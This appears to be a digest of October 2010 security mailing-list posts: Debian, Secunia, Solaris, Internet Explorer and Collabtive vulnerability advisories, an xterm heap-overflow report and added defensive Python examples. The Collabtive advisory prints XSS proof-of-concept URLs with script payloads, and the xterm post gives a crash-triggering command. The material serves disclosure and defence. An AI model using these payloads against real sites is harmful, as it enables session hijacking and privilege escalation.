[SECURITY] [DSA 2116-1] New poppler packages fix several vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

------------------------------------------------------------------------
Debian Security Advisory DSA-2116-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
October 12, 2010                       http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : poppler
Vulnerability  : several
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)      : CVE-2010-3702 CVE-2010-3704
Debian Bug     : 599165

Joel Voss of Leviathan Security Group discovered two vulnerabilities in the Poppler PDF rendering library, which may lead to the execution of arbitrary code if a malformed PDF file is opened.

For the stable distribution (lenny), these problems have been fixed in version 0.8.7-4.

For the unstable distribution (sid), these problems will be fixed soon.

We recommend that you upgrade your poppler packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
--------------------------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:

  http://security.debian.org/pool/updates/main/p/poppler/poppler_0.8.7.orig.tar.gz
    Size/MD5 checksum:  1469587 9af81429d6f8639c357a5eed25583365
  http://security.debian.org/pool/updates/main/p/poppler/poppler_0.8.7-4.diff.gz
    Size/MD5 checksum:    23876 219c5db15e7e0ad3ce01c45b5d2d17b5
  http://security.debian.org/pool/updates/main/p/poppler/poppler_0.8.7-4.dsc
    Size/MD5 checksum:     1481 a2d28a0e06fd0b226e9e87d88aab52e8

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/p/poppler/libpoppler3_0.8.7-4_alpha.deb
    Size/MD5 checksum:   891456 eecf847b41f68e67cfa250c239ab95ff
  http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib3_0.8.7-4_alpha.deb
    Size/MD5 checksum:   220410 cdc18593a727b1a80279ad941a929dee
  http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt4-3_0.8.7-4_alpha.deb
    Size/MD5 checksum:   329946 83a82f4a995727adac2a9cbb19cd0705
  http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.8.7-4_alpha.deb
    Size/MD5 checksum:   303118 8407f059f1395ad93f765cdcf70f6246
  http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt2_0.8.7-4_alpha.deb
    Size/MD5 checksum:   180578 f625e16840c1262de1e33579bfff3e00
  http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.8.7-4_alpha.deb
    Size/MD5 checksum:   197172 2573621fc79b03251735690bfd818f5e
  http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.8.7-4_alpha.deb
    Size/MD5 checksum:  1334994 5fbda5e9f2b3824d3d7ccbb1bcf000d0
  http://security.debian.org/pool/updates/main/p/poppler/poppler-dbg_0.8.7-4_alpha.deb
    Size/MD5 checksum:  3204616 7c7c37da8b894e462b2758524365ca46
  http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.8.7-4_alpha.deb
    Size/MD5 checksum:   234854 06e4977b32fb63577a918c110147e5f6
  http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt4-dev_0.8.7-4_alpha.deb
    Size/MD5 checksum:   452718 751233edf2ec85fd1e095893124f8909

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.8.7-4_amd64.deb
    Size/MD5 checksum:   184848 ed2abc9b1edd4cde56eb40b9b775cf45
  http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.8.7-4_amd64.deb
    Size/MD5 checksum:  1119492 16725109ae348df90c30896be4a0c5de
  http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.8.7-4_amd64.deb
    Size/MD5 checksum:   232702 2e7740b7098cd91493f178745b966d4a
  http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt2_0.8.7-4_amd64.deb
    Size/MD5 checksum:   178414 497a3f7cbff9acdb0b01d58aae33415a
  http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt4-dev_0.8.7-4_amd64.deb
    Size/MD5 checksum:   358376 461a59da2c6b0c7531bba1a385f3607d
  http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.8.7-4_amd64.deb
    Size/MD5 checksum:   275318 3c6b86fb8a57e9f17fbe058a36fa426e
  http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt4-3_0.8.7-4_amd64.deb
    Size/MD5 checksum:   314086 3381ccceeaa1d2727f331d92b59818dd
  http://security.debian.org/pool/updates/main/p/poppler/poppler-dbg_0.8.7-4_amd64.deb
    Size/MD5 checksum:  3148992
Collabtive Multiple Vulnerabilities
ANATOLIA SECURITY ADVISORY

### ADVISORY INFO ###

+ Title: Collabtive Multiple Vulnerabilities
+ Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-003.txt
+ Advisory ID: 2010-003
+ Version: 0.65
+ Date: 12/10/2010
+ Impact: Gaining Administrative Privileges - Execute Malicious Javascript Codes
+ CWE-ID: 352 (Cross-site Request Forgery) - 79 (Cross-site Scripting)
+ Credit: Anatolia Security

### VULNERABLE PRODUCT ###

+ Description: Collabtive provides a web based platform to bring the project management process and documentation online. Collabtive is an open source solution with features and functionality similar to proprietary software such as BaseCamp.
+ Homepage: http://www.collabtive.com

### VULNERABILITY DETAILS ###

I. Non-persistent Cross-site Scripting
--------------------------------------

+ Description: The application inserts the HTTP "y" parameter in manageajax.php and the HTTP "pic" parameter in thumb.php into the HTML output and fails to sanitize these user-supplied inputs. Attackers can execute malicious JavaScript code or hijack the PHPSESSID for privilege escalation.
+ Exploit/POC:
  http://target/manageajax.php?action=newcal&y=<script>alert(/XSS/)</script>
  http://target/thumb.php?pic=<script>alert(/XSS/)</script>

II. Cross-site Request Forgery
------------------------------

+ Description: Collabtive is affected by Cross-site Request Forgery. Technically, an attacker can create a specially crafted page, force Collabtive administrators to visit it, and gain administrative privileges. To prevent CSRF vulnerabilities, the application needs an anti-CSRF token, a captcha, and to ask for the old password for critical actions.
+ Exploit/POC: http://www.anatoliasecurity.com/exploits/collabtive-csrf-xploit.txt

III. Stored Cross-site Scripting
--------------------------------

+ Description: Collabtive has a Stored Cross-site Scripting vulnerability. Every user can change their username, and the application allows HTML code and stores it in the database.
+ Exploit/POC: Change username to user<script>alert(/AS/)</script>.
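The three defences the advisory asks for (a session-bound anti-CSRF token on state-changing actions, output encoding of reflected parameters such as `pic`, and a strict allowlist for stored values such as the username) as an added example. This is illustrative Python written for this page, not Collabtive's code: the handler names, the session id string and the per-process `SERVER_SECRET` are assumptions, and the unsafe renderer exists only to show the defect pattern beside its fix.

```python
import hashlib
import hmac
import html
import re
import secrets

# Constructed for this example: a real deployment loads the secret from
# configuration so tokens survive a process restart.
SERVER_SECRET = secrets.token_bytes(32)

# Allowlist for stored usernames; anything that could carry markup is rejected
# instead of being stored and later rendered (the stored-XSS path above).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def issue_csrf_token(session_id: str) -> str:
    """Derive the token from the session, so a cross-site page, which can
    make the victim's browser send the cookie but cannot read the page that
    contains the token, cannot supply a matching value."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, submitted: str) -> bool:
    expected = issue_csrf_token(session_id)
    # Constant-time comparison; an empty or missing token never matches.
    return hmac.compare_digest(expected, submitted or "")


def handle_admin_action(session_id: str, form: dict) -> str:
    """A state-changing handler (hypothetical): refuse the request outright
    unless the token bound to this session was submitted with it."""
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return "403 Forbidden: missing or invalid CSRF token"
    return "200 OK: action applied"


def render_thumb_unsafe(pic: str) -> str:
    """The defect pattern: a request parameter lands in HTML untouched."""
    return f'<img src="thumbs/{pic}">'


def render_thumb_safe(pic: str) -> str:
    """Fix: encode for the attribute context before interpolating."""
    return f'<img src="thumbs/{html.escape(pic, quote=True)}">'


def valid_username(name: str) -> bool:
    """Accept only names that match the allowlist in full."""
    return USERNAME_RE.fullmatch(name) is not None


if __name__ == "__main__":
    sid = "constructed-session-id"
    token = issue_csrf_token(sid)
    print(handle_admin_action(sid, {"csrf_token": token}))  # 200 OK ...
    print(handle_admin_action(sid, {}))                      # 403 Forbidden ...
    print(render_thumb_unsafe('"><b>'))   # attribute broken out of
    print(render_thumb_safe('"><b>'))     # &quot;&gt;&lt;b&gt; stays inert text
    print(valid_username("alice_01"), valid_username("user<b>x"))  # True False
```

The token here is derived from the session id rather than stored, which keeps the check stateless; a per-form random token stored server-side works equally well. Either way the comparison must be constant-time and the check must run before any state changes.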
ubuntu 10.04 xterm heap overflow,can it be exploit ?
Hi, all!

I found that xterm on Ubuntu 10.04 has a local heap overflow; I don't know whether it can be exploited on glibc 2.11.

Details:

watercl...@ubuntu:~/Downloads$ ls -l `which xterm`
-rwxr-sr-x 1 root utmp 35 2010-03-31 17:47 /usr/bin/xterm
watercl...@ubuntu:~/Downloads$ xterm -fb `perl -e 'print "A"x4000'`
*** glibc detected *** xterm: munmap_chunk(): invalid pointer: 0x080bd314 ***
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(+0x6b591)[0x243591]
/lib/tls/i686/cmov/libc.so.6(+0x6c80e)[0x24480e]
xterm[0x8062c70]
xterm[0x8064b34]
xterm[0x805515d]
/usr/lib/libXt.so.6(+0x23e30)[0x4a2e30]
/usr/lib/libXt.so.6(+0x23fb5)[0x4a2fb5]
/usr/lib/libXt.so.6(XtRealizeWidget+0x9d)[0x4a325d]
xterm[0x8058176]
xterm[0x8069a08]
xterm[0x806bf78]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0x1eebd6]
xterm[0x804d6a1]
======= Memory map: ========
0011-0012b000 r-xp 08:01 147 /lib/ld-2.11.1.so
0012b000-0012c000 r--p 0001a000 08:01 147 /lib/ld-2.11.1.so
0012c000-0012d000 rw-p 0001b000 08:01 147 /lib/ld-2.11.1.so
0012d000-0012e000 r-xp 00:00 0 [vdso]
0012e000-0014 r-xp 08:01 4191 /usr/lib/libXft.so.2.1.13
0014-00141000 r--p 00011000 08:01 4191 /usr/lib/libXft.so.2.1.13
00141000-00142000 rw-p 00012000 08:01 4191 /usr/lib/libXft.so.2.1.13
00142000-00198000 r-xp 08:01 2715 /usr/lib/libXaw7.so.7.0.0
00198000-00199000 r--p 00055000 08:01 2715 /usr/lib/libXaw7.so.7.0.0
00199000-0019f000 rw-p 00056000 08:01 2715 /usr/lib/libXaw7.so.7.0.0
0019f000-001a rw-p 00:00 0
001a-001d4000 r-xp 08:01 4408 /lib/libncurses.so.5.7
001d4000-001d5000 ---p 00034000 08:01 4408 /lib/libncurses.so.5.7
001d5000-001d7000 r--p 00034000 08:01 4408 /lib/libncurses.so.5.7
001d7000-001d8000 rw-p 00036000 08:01 4408 /lib/libncurses.so.5.7
001d8000-0032b000 r-xp 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so
0032b000-0032c000 ---p 00153000 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so
0032c000-0032e000 r--p 00153000 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so
0032e000-0032f000 rw-p 00155000 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so
0032f000-00332000 rw-p 00:00 0
00332000-0036 r-xp 08:01 850 /usr/lib/libfontconfig.so.1.4.4
0036-00361000 r--p 0002d000 08:01 850 /usr/lib/libfontconfig.so.1.4.4
00361000-00362000 rw-p 0002e000 08:01 850 /usr/lib/libfontconfig.so.1.4.4
00362000-0047b000 r-xp 08:01 4046 /usr/lib/libX11.so.6.3.0
0047b000-0047c000 r--p 00118000 08:01 4046 /usr/lib/libX11.so.6.3.0
0047c000-0047e000 rw-p 00119000 08:01 4046 /usr/lib/libX11.so.6.3.0
0047e000-0047f000 rw-p 00:00 0
0047f000-004ce000 r-xp 08:01 3718 /usr/lib/libXt.so.6.0.0
004ce000-004cf000 r--p 0004e000 08:01 3718 /usr/lib/libXt.so.6.0.0
004cf000-004d2000 rw-p 0004f000 08:01 3718 /usr/lib/libXt.so.6.0.0
004d2000-004e7000 r-xp 08:01 2723 /usr/lib/libXmu.so.6.2.0
004e7000-004e8000 r--p 00014000 08:01 2723 /usr/lib/libXmu.so.6.2.0
004e8000-004e9000 rw-p 00015000 08:01 2723 /usr/lib/libXmu.so.6.2.0
004e9000-004fe000 r-xp 08:01 4016 /usr/lib/libICE.so.6.3.0
004fe000-004ff000 r--p 00014000 08:01 4016 /usr/lib/libICE.so.6.3.0
004ff000-0050 rw-p 00015000 08:01 4016 /usr/lib/libICE.so.6.3.0
0050-00502000 rw-p 00:00 0
00502000-00573000 r-xp 08:01 2033 /usr/lib/libfreetype.so.6.3.22
00573000-00577000 r--p 0007 08:01 2033 /usr/lib/libfreetype.so.6.3.22
00577000-00578000 rw-p 00074000 08:01 2033 /usr/lib/libfreetype.so.6.3.22
00578000-0058 r-xp 08:01 4050 /usr/lib/libXrender.so.1.3.0
0058-00581000 r--p 7000 08:01 4050 /usr/lib/libXrender.so.1.3.0
00581000-00582000 rw-p 8000 08:01 4050 /usr/lib/libXrender.so.1.3.0
00582000-0059 r-xp 08:01 4091 /usr/lib/libXext.so.6.4.0
0059-00591000 r--p d000 08:01 4091 /usr/lib/libXext.so.6.4.0
00591000-00592000 rw-p e000 08:01 4091 /usr/lib/libXext.so.6.4.0
00592000-005a1000 r-xp 08:01 2709 /usr/lib/libXpm.so.4.11.0
005a1000-005a2000 r--p e000 08:01 2709 /usr/lib/libXpm.so.4.11.0
005a2000-005a3000 rw-p f000 08:01 2709 /usr/lib/libXpm.so.4.11.0
005a3000-005a5000 r-xp 08:01 1053685 /lib/tls/i686/cmov/libdl-2.11.1.so
005a5000-005a6000 r--p 1000 08:01 1053685 /lib/tls/i686/cmov/libdl-2.11.1.so
005a6000-005a7000 rw-p 2000 08:01 1053685 /lib/tls/i686/cmov/libdl-2.11.1.so
005a7000-005ba000 r-xp 08:01 4125 /lib/libz.so.1.2.3.3
005ba000-005bb000 r--p 00012000 08:01 4125 /lib/libz.so.1.2.3.3
005bb000-005bc000 rw-p 00013000 08:01 4125 /lib/libz.so.1.2.3.3
005bc000-005e r-xp 08:01 90 /lib/libexpat.so.1.5.2
005e-005e2000 r--p 00024000 08:01 90 /lib/libexpat.so.1.5.2
Secunia Research: Microsoft Excel Ghost Record Type Parsing Vulnerability
======================================================================
                     Secunia Research 12/10/2010

      - Microsoft Excel Ghost Record Type Parsing Vulnerability -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Microsoft Excel 2002 SP3

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where:  From remote

======================================================================
3) Vendor's Description of Software

Microsoft Office Excel is a powerful tool you can use to create and format spreadsheets, and analyze and share information to make more informed decisions.

Product Link:
http://office.microsoft.com/en-us/excel/default.aspx

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Excel, which can be exploited by malicious people to potentially compromise a user's system.

The vulnerability is caused by missing input validation in a conversion routine when parsing a certain record type. This can be exploited to corrupt memory outside the bounds of an allocated heap buffer via an overly large range specified by two record fields.

Successful exploitation may allow execution of arbitrary code.

======================================================================
5) Solution

Apply patches provided by MS10-080.

======================================================================
6) Time Table

19/04/2010 - Vendor notified.
19/04/2010 - Vendor response.
27/04/2010 - Vendor provides status update.
25/05/2010 - Vendor provides status update.
30/09/2010 - Vendor provides status update.
12/10/2010 - Public disclosure.

======================================================================
7) Credits

Discovered by Carsten Eiram, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3242 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-65/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
DDIVRT-2009-28 Sun Solaris 10 rpc.cmsd Buffer Overflow and Denial of Service (CVE-2010-3509)
Title
-----
DDIVRT-2009-28 Sun Solaris 10 rpc.cmsd Buffer Overflow and Denial of Service (CVE-2010-3509)

Severity
--------
High

Date Discovered
---------------
November 3, 2009

Discovered By
-------------
Digital Defense, Inc. Vulnerability Research Team
Credit: Alex Kaszczuk, Alan Chin, Jose R. Hernandez and r...@b13$

Vulnerability Description
-------------------------
The rpc.cmsd service contains an integer overflow which can allow a malicious unauthenticated user to cause a denial of service, or remotely execute arbitrary code with root privileges.

Solution Description
--------------------
Sun has addressed this vulnerability in Sun bugID 6214701. The patch is available for download through the Oracle October Critical Patch Update (CPU) released on 12 October, 2010.

Tested Systems / Software (with versions)
-----------------------------------------
Sun Solaris 10 (10/09 Download)

Vendor Contact
--------------
Vendor Name: Sun Microsystems
Vendor Website: http://www.sun.com/
Secunia Research: Microsoft Excel Record Parsing Integer Overflow Vulnerability
======================================================================
                     Secunia Research 12/10/2010

    - Microsoft Excel Record Parsing Integer Overflow Vulnerability -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Microsoft Excel 2002 SP3

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where:  From remote

======================================================================
3) Vendor's Description of Software

Microsoft Office Excel is a powerful tool you can use to create and format spreadsheets, and analyze and share information to make more informed decisions.

Product Link:
http://office.microsoft.com/en-us/excel/default.aspx

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Excel, which can be exploited by malicious people to potentially compromise a user's system.

The vulnerability is caused by a sign-extension error and integer overflow when processing a certain record type and can be exploited to cause a heap-based buffer overflow via a specially crafted Excel file.

Successful exploitation may allow execution of arbitrary code.

======================================================================
5) Solution

Apply patches provided by MS10-080.

======================================================================
6) Time Table

29/03/2010 - Vendor notified.
30/03/2010 - Vendor response.
27/04/2010 - Vendor provides status update.
30/09/2010 - Vendor provides status update.
12/10/2010 - Public disclosure.

======================================================================
7) Credits

Discovered by Alin Rad Pop, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3230 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-64/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
[SECURITY] [DSA 2120-1] New postgresql-8.3 packages fix privilege escalation
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

------------------------------------------------------------------------
Debian Security Advisory DSA-2120-1                   secur...@debian.org
http://www.debian.org/security/                            Florian Weimer
October 12, 2010                       http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : postgresql-8.3
Vulnerability  : privilege escalation
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2010-3433

Tim Bunce discovered that PostgreSQL, a database server software, does not properly separate interpreters for server-side stored procedures which run in different security contexts. As a result, non-privileged authenticated database users might gain additional privileges.

Note that this security update may impact intended communication through global variables between stored procedures. It might be necessary to convert these functions to run under the plperlu or pltclu languages, with database superuser privileges.

This security update also includes unrelated bug fixes from PostgreSQL 8.3.12.

For the stable distribution (lenny), this problem has been fixed in version 8.3_8.3.12-0lenny1.

For the unstable distribution (sid), this problem has been fixed in version 8.4.5-1 of the postgresql-8.4 package.

We recommend that you upgrade your PostgreSQL packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
--------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.12-0lenny1.dsc
    Size/MD5 checksum:     2313 1663c4c9915f51a31ff6e6b7b3bda545
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.12.orig.tar.gz
    Size/MD5 checksum: 13955500 03b56e23c3bcdc36eee3156334b8b97b
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.12-0lenny1.diff.gz
    Size/MD5 checksum:    52479 e39048a272b6085ad0dce1933a1b1f5b

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-doc_8.3.12-0lenny1_all.deb
    Size/MD5 checksum:   273756 95f2dc5525e464769715c302d9141df4
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib_8.3.12-0lenny1_all.deb
    Size/MD5 checksum:   273824 0c762a2fed4bf2b85120b4fc6a3c5d09
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-doc-8.3_8.3.12-0lenny1_all.deb
    Size/MD5 checksum:  2213230 61228c350de23b18674fc3a2b0d11e44
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql_8.3.12-0lenny1_all.deb
    Size/MD5 checksum:   273944 b89079dac539bbbaed5794bee7f4d3c3
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client_8.3.12-0lenny1_all.deb
    Size/MD5 checksum:   273928 744cf8e343f7c1c658eb64f976797736

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.12-0lenny1_alpha.deb
    Size/MD5 checksum:   293706 41c14c7e0ea6dc1f6b4015fa0b3bdc9a
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.12-0lenny1_alpha.deb
    Size/MD5 checksum:   638416 e3c55350fc57d889281157d9047da119
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.12-0lenny1_alpha.deb
    Size/MD5 checksum:   498186 27c76b0e919d5d98d5573dd3cf8a29b4
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.12-0lenny1_alpha.deb
    Size/MD5 checksum:  1720192 853975a17102b21ae9bcfe8ada0e8f20
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.12-0lenny1_alpha.deb
    Size/MD5 checksum:   412750 6514158a601f1f553c2930a647f777a1
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.12-0lenny1_alpha.deb
    Size/MD5 checksum:   282464 ceca3e409d28a80f4fc409a01f605065
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.12-0lenny1_alpha.deb
    Size/MD5 checksum:   292584 0435ab52cdf05454cc911432c03276fa
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.12-0lenny1_alpha.deb
    Size/MD5 checksum:   850022 2ff3573cbdd9dd0d89666a619c7e43b9
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.12-0lenny1_alpha.deb
    Size/MD5 checksum:   302546 e1dfd28c264c5f99ce6e6e7b25500b61
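Both Debian advisories on this page (DSA-2116-1 for poppler and DSA-2120-1 for postgresql-8.3) publish a "Size/MD5 checksum" pair for every file and tell the reader to fetch with wget and install with dpkg -i. The step between those two commands, checking the downloaded file against the advisory, is what the following added example implements; it is illustrative Python written for this page, not a Debian tool. The sample advisory text embeds two entries copied from the DSA-2120-1 list above; the file content in `demo_verify` is constructed.

```python
import hashlib
import hmac
import os
import re
import tempfile

# Matches the line that follows each URL in a DSA file list. The advisory
# text sometimes has no space after the colon, so the whitespace is optional.
_CHECKSUM_RE = re.compile(r"^Size/MD5 checksum:\s*(\d+)\s+([0-9a-f]{32})$")


def parse_checksums(advisory_text: str) -> dict:
    """Map each package file name to (size, md5) taken from a DSA's file list."""
    entries = {}
    lines = [line.strip() for line in advisory_text.splitlines()]
    for i, line in enumerate(lines):
        match = _CHECKSUM_RE.match(line)
        if match and i > 0 and lines[i - 1].startswith("http"):
            name = lines[i - 1].rsplit("/", 1)[-1]
            entries[name] = (int(match.group(1)), match.group(2))
    return entries


def verify_package(path: str, expected_size: int, expected_md5: str):
    """Return (True, 'ok') or (False, reason). The size is compared first so a
    truncated or oversized download is rejected before anything is hashed."""
    actual_size = os.path.getsize(path)
    if actual_size != expected_size:
        return False, f"size {actual_size} != {expected_size}"
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    if not hmac.compare_digest(digest.hexdigest(), expected_md5.lower()):
        return False, "md5 mismatch"
    return True, "ok"


# Two entries copied from the DSA-2120-1 file list on this page.
SAMPLE_ADVISORY = """
Debian GNU/Linux 5.0 alias lenny
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.12-0lenny1.dsc
    Size/MD5 checksum:     2313 1663c4c9915f51a31ff6e6b7b3bda545
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.12-0lenny1_alpha.deb
    Size/MD5 checksum:   302546 e1dfd28c264c5f99ce6e6e7b25500b61
"""


def demo_verify(content: bytes):
    """Write constructed bytes to a temporary file, verify them against their
    own size and digest, then against a wrong digest; return both results."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(content)
        path = tmp.name
    try:
        good = verify_package(path, len(content), hashlib.md5(content).hexdigest())
        wrong = verify_package(path, len(content), "0" * 32)
    finally:
        os.unlink(path)
    return good, wrong


if __name__ == "__main__":
    for name, (size, md5) in parse_checksums(SAMPLE_ADVISORY).items():
        print(f"{name}: {size} bytes, md5 {md5}")
    print(demo_verify(b"constructed package bytes"))  # ((True, 'ok'), (False, 'md5 mismatch'))
```

The MD5 values match what the advisory publishes and catch a corrupted or wrong download; they are not a substitute for the PGP signature on the advisory itself or for the signed Release files that apt-get checks, which is what establishes that the list of checksums is genuine.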
Internet Explorer Uninitialized Memory Corruption Vulnerability - CVE-2010-3331
Dear List,

I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability.

Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/

Internet Explorer Uninitialized Memory Corruption Vulnerability
CVE-2010-3331 - MS10-071

INTRODUCTION

There exists a vulnerability in the way Internet Explorer handles specific objects that have not been correctly initialized or have been deleted, which leads to an uninitialized memory reference and code execution. This vulnerability can be triggered through different vectors, Microsoft Word being one of the tested ones.

This problem was confirmed in the following versions of Internet Explorer and Windows; other versions may also be affected.

Internet Explorer 6 running in all versions of Windows
Internet Explorer 7 running in all versions of Windows
Internet Explorer 8 running in all versions of Windows

MICROSOFT EXPLOITABILITY INDEX

In order to help the Microsoft Response Team we did further analysis on the vulnerability and we classify it as: 1 - consistent exploit code likely.

It is important to note again that since the faulty code also appears inside mshtml.dll, other applications may behave differently when triggering the problem (even more so when talking about 3rd parties).

CVSS SCORING SYSTEM

The CVSS score is: 8.3
Base Score: 10
Temporal Score: 8.3

We used the following values to calculate the scores:
Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:C
Temporal score is: E:F/RL:OF/RC:C

TRIGGERING THE PROBLEM

This vulnerability can be triggered by creating a persistent object with class id CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389. The problem is triggered by exploit code available to interested parties, which causes invalid memory access in all the referred versions.

CREDITS

This vulnerability was discovered and researched by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT).

Best Regards,

Rodrigo.

--
Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies
IBWAS'10 CfTraining - Deadline Approaching
Dear all,

the deadline for submitting Training proposals for IBWAS'10 is approaching. Please advertise this. (Sorry for the spam and for receiving multiple copies of this.)

Best regards,

------------------------------------------------------------------------
2nd OWASP Ibero-American Web-Applications Security conference (IBWAS'10)
ISCTE - Lisbon University Institute
25th - 26th November 2010
Lisboa, Portugal
http://www.ibwas.com

**CALL FOR TRAINING SESSIONS**

